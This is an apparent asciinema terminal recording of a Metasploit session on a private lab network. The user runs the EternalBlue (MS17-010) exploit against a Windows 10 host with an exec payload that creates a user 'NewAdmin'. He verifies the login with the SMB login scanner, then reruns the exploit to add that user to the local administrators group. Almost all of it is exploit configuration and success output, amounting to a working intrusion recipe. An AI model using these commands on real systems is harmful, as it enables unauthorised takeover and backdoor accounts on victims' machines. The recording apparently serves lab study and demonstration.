{"version": 2, "width": 162, "height": 37, "timestamp": 1635839344, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.092733, "o", "\u001b[?2004h\u001b[1;33mnicolas\u001b[0m@\u001b[1;2;32mparrot\u001b[0m in \u001b[1;36m~/Documents/Projets/eternalblue\u001b[0m on \u001b[1;34m☁️  \u001b[0m\u001b[1;34mnicolas.vincent\u001b[0m\u001b[1;34m@\u001b[0m\u001b[1;34madrenalyse.com\u001b[0m\u001b[1;34m(\u001b[0m\u001b[1;34meurope-west1\u001b[0m\u001b[1;34m)\u001b[0m \r\n🕙 08:49:04 \u001b[1;32m❯\u001b[0m "]
[0.980754, "o", "m"]
[1.327564, "o", "s"]
[1.592539, "o", "f"]
[1.871269, "o", "c"]
[2.734305, "o", "o"]
[4.043761, "o", "n"]
[4.175669, "o", "s"]
[4.29903, "o", "o"]
[4.493489, "o", "l"]
[4.610093, "o", "e"]
[4.898456, "o", "\r\n\u001b[?2004l\r"]
[7.762605, "o", "[*] Starting the Metasploit Framework console.../\r"]
[7.862735, "o", "[*] Starting the Metasploit Framework console...-\r"]
[8.063018, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[8.183675, "o", "[*] starting the Metasploit Framework console...|\r"]
[8.283895, "o", "[*] STarting the Metasploit Framework console.../\r"]
[8.385431, "o", "[*] StArting the Metasploit Framework console...-\r"]
[8.486512, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[8.586791, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[8.690004, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[8.801278, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[8.901276, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[9.001493, "o", "[*] Starting the Metasploit Framework console...|\r"]
[9.045408, "o", "\u001b[1m\u001b[33m[!]\u001b[0m The following modules could not be loaded!\r\n"]
[9.045769, "o", "\u001b[1m\u001b[33m[!]\u001b[0m \t/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go\r\n"]
[9.045864, "o", "\u001b[1m\u001b[33m[!]\u001b[0m \t/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go\r\n"]
[9.046015, "o", "\u001b[1m\u001b[33m[!]\u001b[0m \t/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go\r\n"]
[9.046107, "o", "\u001b[1m\u001b[33m[!]\u001b[0m Please see /home/nicolas/.msf4/logs/framework.log for details.\r\n"]
[9.08387, "o", "\r                                                  \r\n"]
[9.084006, "o", "\u001b[0m"]
[9.088866, "o", "\u001b[36m\u001b[0m\r\n ______________________________________________________________________________\r\n|                                                                              |\r\n|                   \u001b[1m\u001b[32mMETASPLOIT CYBER MISSILE COMMAND V5\u001b[0m                        |\r\n|______________________________________________________________________________|\r\n      \u001b[33m\\\u001b[0m                                  \u001b[33m/\u001b[0m                      \u001b[33m/\u001b[0m\r\n       \u001b[33m\\\u001b[0m     .                          \u001b[33m/\u001b[0m                      \u001b[33m/\u001b[0m            x\r\n        \u001b[33m\\\u001b[0m                              \u001b[33m/\u001b[0m                      \u001b[33m/\u001b[0m\r\n         \u001b[33m\\\u001b[0m                            \u001b[33m/\u001b[0m          +           \u001b[33m/\u001b[0m\r\n          \u001b[33m\\\u001b[0m            +             \u001b[33m/\u001b[0m                      \u001b[33m/\u001b[0m\r\n           *                        \u001b[33m/\u001b[0m                      \u001b[33m/\u001b[0m\r\n                                   \u001b[33m/\u001b[0m      .               \u001b[33m/\u001b[0m\r\n    X                             \u001b[33m/\u001b"]
[9.089025, "o", "[0m                      \u001b[33m/\u001b[0m            X\r\n                                 \u001b[33m/\u001b[0m                     \u001b[31m###\u001b[0m\r\n                                \u001b[33m/\u001b[0m                     \u001b[31m# \u001b[1m%\u001b[0m\u001b[31m #\u001b[0m\r\n                               \u001b[33m/\u001b[0m                       \u001b[31m###\u001b[0m\r\n                      .       \u001b[33m/\u001b[0m\r\n     .                       \u001b[33m/\u001b[0m      .            \u001b[31m*\u001b[0m           .\r\n                            \u001b[33m/\u001b[0m\r\n                           *\r\n                  +                       \u001b[31m*\u001b[0m\r\n\r\n                                       \u001b[1m^\u001b[0m\r\n####      __     __     __          #######         __     __     __        ####\r\n####    \u001b[33m/\u001b[0m    \u001b[33m\\\u001b[0m \u001b[33m/\u001b[0m    \u001b[33m\\\u001b[0m \u001b[33m/\u001b[0m    \u001b[33m\\\u001b[0m      ###########     \u001b[33m/\u001b[0m    \u001b[33m\\\u001b[0m \u001b[33m/\u001b[0m    \u001b[33m\\\u001b[0m \u001b[33m/\u001b[0m    \u001b[33m\\\u001b[0m      ####\r\n################################################################################\r\n########################################################################"]
[9.089047, "o", "########\r\n# \u001b[1mWAVE 5\u001b[0m ######## \u001b[1mSCORE 31337\u001b[0m ################################## \u001b[1mHIGH FFFFFFFF\u001b[0m #\r\n################################################################################\r\n                                                           https://metasploit.com\u001b[0m\r\n\u001b[0m\r\n\r\n       =[ \u001b[33mmetasploit v6.1.9-dev\u001b[0m                           ]\r\n+ -- --=[ 2170 exploits - 1146 auxiliary - 398 post       ]\r\n+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]\r\n+ -- --=[ 9 evasion                                       ]\r\n\r\nMetasploit tip: View missing module options with \u001b[32mshow \r\nmissing\u001b[0m\r\n\r\n"]
[9.11564, "o", "\u001b[?1034h"]
[9.127405, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[10.189683, "o", "r"]
[10.287677, "o", "e"]
[10.568999, "o", "s"]
[10.783565, "o", "ource "]
[11.220316, "o", "\u0007"]
[11.410858, "o", "\r\r\nresource README.m"]
[11.410924, "o", "d                          resource "]
[11.410956, "o", "bap_fl"]
[11.411147, "o", "ash_only.rc                  resource oracle"]
[11.411198, "o", "_sids.rc\r"]
[11.41122, "o", "\r\nre"]
[11.411678, "o", "source auto_brute.rc                      resource bap_ie_only.rc                     resource oracle_tns.rc\r\r\nr"]
[11.411818, "o", "esource auto_cred_ch"]
[11.411919, "o", "ecker.rc               reso"]
[11.411954, "o", "urce b"]
[11.412041, "o", "asic"]
[11.412146, "o", "_discovery.rc                 resource"]
[11.412221, "o", " port_cleaner"]
[11.412288, "o", ".rc\r\r\n"]
[11.412313, "o", "resource "]
[11.412385, "o", "aut"]
[11.412442, "o", "o_pass_the_hash.r"]
[11.4125, "o", "c              resourc"]
[11.412553, "o", "e dev"]
[11.412611, "o", "_checks.r"]
[11.412673, "o", "c                      resourc"]
[11.412715, "o", "e ports"]
[11.41288, "o", "can.r"]
[11.413022, "o", "c\r\r\nresource auto_win32_multihandler.rc         "]
[11.413046, "o", "re"]
[11.413061, "o", "sour"]
[11.413082, "o", "ce "]
[11.413514, "o", "eter"]
[11.413623, "o", "nalblue_windows10_add_user.rc  resource record.cast\r\r\nresource autocrawler.rc                     r"]
[11.413821, "o", "esource fileformat_generato"]
[11.413888, "o", "r.rc            resourc"]
[11.413905, "o", "e r"]
[11.41392, "o", "un_"]
[11.413938, "o", "all"]
[11.413958, "o", "_po"]
[11.413972, "o", "st."]
[11.413987, "o", "rc"]
[11.414152, "o", "\r\r\nresource autoexploit"]
[11.414173, "o", ".rc"]
[11.41469, "o", "                     re"]
[11.414873, "o", "source mssql_brute.rc                     resource smb_checks.rc\r\r\nresource bap_all.rc                         resource multi_post.rc                      resource s"]
[11.414902, "o", "mb_va"]
[11.414924, "o", "lid"]
[11.414942, "o", "at"]
[11.415033, "o", "e.rc\r\r\nresourc"]
[11.415096, "o", "e bap_dryru"]
[11.415112, "o", "n_o"]
[11.415128, "o", "nly"]
[11.415145, "o", ".r"]
[11.415447, "o", "c                 resource nessus_vulns_cleaner.rc            resou"]
[11.415629, "o", "rce windows_smb_user.png\r\r\n"]
[11.415651, "o", "re"]
[11.415667, "o", "sou"]
[11.415683, "o", "rce"]
[11.415702, "o", " ba"]
[11.415717, "o", "p_f"]
[11.415733, "o", "ir"]
[11.415751, "o", "efo"]
[11.415767, "o", "x_o"]
[11.415782, "o", "nl"]
[11.415799, "o", "y.r"]
[11.415815, "o", "c                "]
[11.415978, "o", "resource oracle_login."]
[11.415997, "o", "r"]
[11.416012, "o", "c                    re"]
[11.416028, "o", "so"]
[11.416044, "o", "u"]
[11.416071, "o", "rce w"]
[11.416085, "o", "map"]
[11.4161, "o", "_a"]
[11.416222, "o", "utotest.rc\r\r\n"]
[11.416566, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> resource "]
[12.899642, "o", "e"]
[13.070602, "o", "t"]
[13.139553, "o", "e"]
[13.258917, "o", "r"]
[13.44386, "o", "nalblue_windows10_add_user.rc "]
[15.253027, "o", "\r\r\n"]
[15.257291, "o", "\u001b[0m"]
[15.265377, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Processing /home/nicolas/Documents/Projets/eternalblue/eternalblue_windows10_add_user.rc for ERB directives.\r\n"]
[15.265863, "o", "resource (/home/nicolas/Documents/Projets/eternalblue/eternalblue_windows10_add_user.rc)> use exploit/windows/smb/ms17_010_eternalblue\r\n"]
[15.266515, "o", "\u001b[0m"]
[15.403874, "o", "\u001b[1m\u001b[34m[*]\u001b[0m No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp\r\n"]
[15.403999, "o", "resource (/home/nicolas/Documents/Projets/eternalblue/eternalblue_windows10_add_user.rc)> set rhosts 192.168.56.102\r\n"]
[15.404106, "o", "\u001b[0m"]
[15.409399, "o", "rhosts => 192.168.56.102\r\n"]
[15.409552, "o", "resource (/home/nicolas/Documents/Projets/eternalblue/eternalblue_windows10_add_user.rc)> set SMBUser Test\r\n"]
[15.40974, "o", "\u001b[0m"]
[15.413794, "o", "SMBUser => Test\r\n"]
[15.413942, "o", "resource (/home/nicolas/Documents/Projets/eternalblue/eternalblue_windows10_add_user.rc)> set SMBPass password\r\n"]
[15.414032, "o", "\u001b[0m"]
[15.417902, "o", "SMBPass => password\r\n"]
[15.418016, "o", "resource (/home/nicolas/Documents/Projets/eternalblue/eternalblue_windows10_add_user.rc)> set payload windows/x64/exec\r\n"]
[15.418144, "o", "\u001b[0m"]
[15.423252, "o", "payload => windows/x64/exec\r\n"]
[15.423366, "o", "resource (/home/nicolas/Documents/Projets/eternalblue/eternalblue_windows10_add_user.rc)> set cmd net user /add NewAdmin root\r\n"]
[15.423499, "o", "\u001b[0m"]
[15.427534, "o", "cmd => net user /add NewAdmin root\r\n"]
[15.433663, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[17.460334, "o", "o"]
[17.691355, "o", "p"]
[17.789767, "o", "t"]
[17.927316, "o", "i"]
[18.099792, "o", "o"]
[18.367406, "o", "n"]
[18.529303, "o", "s"]
[19.361777, "o", "\r\r\n"]
[19.36376, "o", "\u001b[0m"]
[19.369179, "o", "\r\nModule options (exploit/windows/smb/ms17_010_eternalblue):\r\n\r\n   Name           Current Setting  Required  Description\r\n   ----           ---------------  --------  -----------\r\n   RHOSTS         192.168.56.102   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit\r\n   RPORT          445              yes       The target port (TCP)\r\n   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Em\r\n                                             bedded Standard 7 target machines.\r\n   SMBPass        password         no        (Optional) The password for the specified username\r\n   SMBUser        Test             no        (Optional) The username to authenticate as\r\n   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedd\r\n                                             e"]
[19.369258, "o", "d Standard 7 target machines.\r\n   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standar\r\n                                             d 7 target machines.\r\n\r\n"]
[19.370052, "o", "\r\nPayload options (windows/x64/exec):\r\n\r\n   Name      Current Setting              Required  Description\r\n   ----      ---------------              --------  -----------\r\n   CMD       net user /add NewAdmin root  yes       The command string to execute\r\n   EXITFUNC  thread                       yes       Exit technique (Accepted: '', seh, thread, process, none)\r\n\r\n"]
[19.370555, "o", "\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic Target\r\n\r\n\r\n"]
[19.376618, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[22.804622, "o", "e"]
[23.062407, "o", "x"]
[23.209487, "o", "p"]
[23.402845, "o", "l"]
[23.614659, "o", "o"]
[23.774981, "o", "i"]
[23.849664, "o", "t"]
[25.096197, "o", "\b"]
[25.096416, "o", "\u001b[K"]
[25.696554, "o", "\b\u001b[K"]
[25.736471, "o", "\b\u001b[K"]
[25.776258, "o", "\b\u001b[K"]
[25.816461, "o", "\b\u001b[K"]
[25.856759, "o", "\b\u001b[K"]
[25.900508, "o", "\b\u001b[K"]
[25.936587, "o", "\u0007"]
[25.977086, "o", "\u0007"]
[26.017661, "o", "\u0007"]
[26.058441, "o", "\u0007"]
[26.218116, "o", "r"]
[26.390424, "o", "u"]
[26.571107, "o", "n"]
[26.77983, "o", "\r\r\n"]
[26.784128, "o", "\u001b[0m"]
[26.821535, "o", "\r\n"]
[26.821656, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check\r\n"]
[26.856853, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445    - Host is likely VULNERABLE to MS17-010! - Windows 10 Pro 10240 x64 (64-bit)\r\n"]
[27.506723, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445    - Scanned 1 of 1 hosts (100% complete)\r\n"]
[27.512482, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - The target is vulnerable.\r\n"]
[27.513129, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445 - shellcode size: 1067\r\n"]
[27.513292, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445 - numGroomConn: 12\r\n"]
[27.529642, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445 - Target OS: Windows 10 Pro 10240\r\n"]
[27.533845, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - got good NT Trans response\r\n"]
[27.562718, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - got good NT Trans response\r\n"]
[27.581263, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - SMB1 session setup allocate nonpaged pool success\r\n"]
[27.600619, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - SMB1 session setup allocate nonpaged pool success\r\n"]
[27.609201, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - good response status for nx: INVALID_PARAMETER\r\n"]
[27.611718, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - good response status for nx: INVALID_PARAMETER\r\n"]
[37.849297, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Exploit completed, but no session was created.\r\n"]
[37.863712, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[39.863459, "o", "u"]
[39.863646, "o", "s"]
[39.863689, "o", "e"]
[39.863711, "o", " "]
[39.864203, "o", "auxilia"]
[39.864219, "o", "r"]
[39.864491, "o", "y/sc"]
[39.864546, "o", "a"]
[39.864717, "o", "nn"]
[39.864794, "o", "e"]
[39.864832, "o", "r"]
[39.864918, "o", "/"]
[39.864985, "o", "s"]
[39.865064, "o", "m"]
[39.865132, "o", "b"]
[39.865212, "o", "/"]
[39.865299, "o", "s"]
[39.865366, "o", "m"]
[39.865446, "o", "b"]
[39.865543, "o", "_"]
[39.865638, "o", "l"]
[39.865705, "o", "o"]
[39.865786, "o", "g"]
[39.865871, "o", "i"]
[39.865959, "o", "n"]
[40.579518, "o", "\r\r\n"]
[40.584266, "o", "\u001b[0m"]
[40.624794, "o", "\u001b[4mmsf6\u001b[0m auxiliary(\u001b[1m\u001b[31mscanner/smb/smb_login\u001b[0m) \u001b[0m> "]
[44.926966, "o", "\r"]
[44.927155, "o", "\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P(reverse-i-search)`':\u001b[C"]
[45.269838, "o", "\b\b\br': use auxiliary/scanner/smb/smb_login\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[45.495784, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[45.495848, "o", "\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[Ph': set rhosts 192.168.56.102"]
[45.495868, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[45.718179, "o", "\b\b\b\b\b\b\bo': set rhosts 192.168.56.102\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[46.156644, "o", "\r"]
[46.156832, "o", "\u001b[4mmsf6\u001b[0m auxiliary(\u001b[1m\u001b[31mscanner/smb/smb_login\u001b[0m) \u001b[0m> set rhosts 192.168.56.102\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[46.157148, "o", "\r\r\n"]
[46.160972, "o", "\u001b[0m"]
[46.16925, "o", "rhosts => 192.168.56.102\r\n"]
[46.183475, "o", "\u001b[4mmsf6\u001b[0m auxiliary(\u001b[1m\u001b[31mscanner/smb/smb_login\u001b[0m) \u001b[0m> "]
[53.193947, "o", "s"]
[53.194003, "o", "e"]
[53.194113, "o", "t "]
[53.194175, "o", "SM"]
[53.194223, "o", "B"]
[53.1943, "o", "U"]
[53.194323, "o", "s"]
[53.194377, "o", "e"]
[53.194551, "o", "r N"]
[53.194591, "o", "e"]
[53.194653, "o", "w"]
[53.194715, "o", "A"]
[53.194767, "o", "d"]
[53.194837, "o", "m"]
[53.194906, "o", "i"]
[53.195111, "o", "n"]
[53.635661, "o", "\r\r\n"]
[53.639764, "o", "\u001b[0m"]
[53.647581, "o", "SMBUser => NewAdmin\r\n"]
[53.661238, "o", "\u001b[4mmsf6\u001b[0m auxiliary(\u001b[1m\u001b[31mscanner/smb/smb_login\u001b[0m) \u001b[0m> "]
[54.225336, "o", "s"]
[54.408165, "o", "e"]
[54.505259, "o", "t"]
[55.107775, "o", " "]
[55.479428, "o", "S"]
[55.665287, "o", "M"]
[55.820741, "o", "B"]
[56.189942, "o", "P"]
[56.368005, "o", "a"]
[56.598912, "o", "s"]
[56.713211, "o", "s"]
[57.492745, "o", " "]
[57.821071, "o", "r"]
[58.00632, "o", "o"]
[58.231092, "o", "t"]
[58.593521, "o", "\b"]
[58.593601, "o", "\u001b[K"]
[58.789715, "o", "o"]
[58.858511, "o", "t"]
[60.387503, "o", "\r\r\n"]
[60.392371, "o", "\u001b[0m"]
[60.401193, "o", "SMBPass => root\r\n"]
[60.415964, "o", "\u001b[4mmsf6\u001b[0m auxiliary(\u001b[1m\u001b[31mscanner/smb/smb_login\u001b[0m) \u001b[0m> "]
[61.572414, "o", "r"]
[61.742177, "o", "u"]
[61.92575, "o", "n"]
[62.272909, "o", "\r\r\n"]
[62.27732, "o", "\u001b[0m"]
[62.320369, "o", "\r\n"]
[62.320498, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445    - 192.168.56.102:445 - Starting SMB login bruteforce\r\n"]
[62.358927, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445    - 192.168.56.102:445 - Success: '.\\NewAdmin:root'\r\n"]
[62.428468, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445    - Scanned 1 of 1 hosts (100% complete)\r\n"]
[62.432946, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Auxiliary module execution completed\r\n"]
[62.438398, "o", "\u001b[4mmsf6\u001b[0m auxiliary(\u001b[1m\u001b[31mscanner/smb/smb_login\u001b[0m) \u001b[0m> "]
[78.616352, "o", "u"]
[78.616446, "o", "s"]
[78.616667, "o", "e"]
[78.616764, "o", " "]
[78.616938, "o", "e"]
[78.618382, "o", "x"]
[78.618738, "o", "pl"]
[78.619097, "o", "oi"]
[78.619295, "o", "t"]
[78.619407, "o", "/"]
[78.61967, "o", "w"]
[78.619828, "o", "i"]
[78.619967, "o", "n"]
[78.620162, "o", "d"]
[78.620486, "o", "o"]
[78.620629, "o", "w"]
[78.620955, "o", "s"]
[78.621095, "o", "/"]
[78.621389, "o", "s"]
[78.621517, "o", "m"]
[78.621586, "o", "b"]
[78.621659, "o", "/"]
[78.621736, "o", "m"]
[78.621815, "o", "s"]
[78.621891, "o", "1"]
[78.621975, "o", "7"]
[78.622065, "o", "_"]
[78.62215, "o", "0"]
[78.622237, "o", "1"]
[78.622324, "o", "0"]
[78.622421, "o", "_"]
[78.622506, "o", "e"]
[78.622622, "o", "t"]
[78.622697, "o", "e"]
[78.622802, "o", "r"]
[78.62289, "o", "n"]
[78.623003, "o", "a"]
[78.62311, "o", "l"]
[78.623331, "o", "bl"]
[78.623429, "o", "u"]
[78.623549, "o", "e"]
[79.313552, "o", "\r\r\n"]
[79.318177, "o", "\u001b[0m"]
[79.332881, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Using configured payload windows/x64/exec\r\n"]
[79.346231, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[88.975548, "o", "\r\u001b[K"]
[88.975751, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[89.016083, "o", "\r\u001b[K"]
[89.0164, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[89.045567, "o", "\r\u001b[K"]
[89.04568, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[89.072193, "o", "\r\u001b[K"]
[89.072318, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[89.107733, "o", "\r\u001b[K"]
[89.107826, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[89.128357, "o", "s"]
[89.128479, "o", "et"]
[89.128495, "o", " "]
[89.128549, "o", "c"]
[89.128985, "o", "md net l"]
[89.129215, "o", "oca"]
[89.129267, "o", "l"]
[89.129314, "o", "g"]
[89.129526, "o", "ro"]
[89.129622, "o", "u"]
[89.129684, "o", "p"]
[89.129785, "o", " "]
[89.129886, "o", "/"]
[89.129983, "o", "a"]
[89.130119, "o", "d"]
[89.130229, "o", "d"]
[89.130344, "o", " "]
[89.13046, "o", "a"]
[89.130585, "o", "d"]
[89.130726, "o", "m"]
[89.130866, "o", "i"]
[89.143145, "o", "n"]
[89.143368, "o", "i"]
[89.143555, "o", "s"]
[89.143745, "o", "t"]
[89.143898, "o", "r"]
[89.144092, "o", "a"]
[89.1443, "o", "t"]
[89.14449, "o", "o"]
[89.144748, "o", "r"]
[89.144974, "o", "s"]
[89.145168, "o", " "]
[89.145387, "o", "N"]
[89.145638, "o", "e"]
[89.145874, "o", "w"]
[89.146133, "o", "A"]
[89.146369, "o", "d"]
[89.146623, "o", "m"]
[89.14683, "o", "i"]
[89.147028, "o", "n"]
[89.147237, "o", " "]
[91.517245, "o", "\r\r\n"]
[91.522084, "o", "\u001b[0m"]
[91.530731, "o", "cmd => net localgroup /add administrators NewAdmin\r\n"]
[91.5469, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[92.492845, "o", "\r\u001b[K"]
[92.492975, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[92.636254, "o", "\r\u001b[K"]
[92.636361, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[93.150024, "o", "\r\u001b[K"]
[93.150151, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[93.754165, "o", "\r\u001b[K"]
[93.754814, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[95.027307, "o", "\r\u001b[K"]
[95.027431, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[96.873692, "o", "r"]
[97.045726, "o", "u"]
[97.264308, "o", "n"]
[97.572456, "o", "\r\r\n"]
[97.577012, "o", "\u001b[0m"]
[97.619807, "o", "\r\n\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check\r\n"]
[97.652065, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445    - Host is likely VULNERABLE to MS17-010! - Windows 10 Pro 10240 x64 (64-bit)\r\n"]
[97.674473, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445    - Scanned 1 of 1 hosts (100% complete)\r\n"]
[97.681005, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - The target is vulnerable.\r\n"]
[97.681561, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445 - shellcode size: 1083\r\n"]
[97.681707, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445 - numGroomConn: 12\r\n"]
[97.693426, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.56.102:445 - Target OS: Windows 10 Pro 10240\r\n"]
[97.696508, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - got good NT Trans response\r\n"]
[97.724807, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - got good NT Trans response\r\n"]
[97.742968, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - SMB1 session setup allocate nonpaged pool success\r\n"]
[97.760738, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - SMB1 session setup allocate nonpaged pool success\r\n"]
[97.769203, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - good response status for nx: INVALID_PARAMETER\r\n"]
[97.77163, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.56.102:445 - good response status for nx: INVALID_PARAMETER\r\n"]
[107.992242, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Exploit completed, but no session was created.\r\n"]
[107.998224, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[109.424709, "o", "e"]
[109.726284, "o", "x"]
[109.885612, "o", "i"]
[110.009864, "o", "t"]
[110.333229, "o", "\r\r\n"]
[110.335137, "o", "\u001b[0m"]
[110.701047, "o", "\u001b[?2004h\u001b[1;33mnicolas\u001b[0m@\u001b[1;2;32mparrot\u001b[0m in \u001b[1;36m~/Documents/Projets/eternalblue\u001b[0m on \u001b[1;34m☁️  \u001b[0m\u001b[1;34mnicolas.vincent\u001b[0m\u001b[1;34m@\u001b[0m\u001b[1;34madrenalyse.com\u001b[0m\u001b[1;34m(\u001b[0m\u001b[1;34meurope-west1\u001b[0m\u001b[1;34m)\u001b[0m  took \u001b[1;33m1m45s\u001b[0m\r\n🕙 08:50:55 \u001b[1;32m❯\u001b[0m "]
[111.669275, "o", "e"]
[111.905678, "o", "x"]
[112.025372, "o", "i"]
[112.185455, "o", "t"]
[112.432575, "o", "\r\n"]
[112.432611, "o", "\u001b[?2004l\r"]
[112.434249, "o", "exit\r\n"]
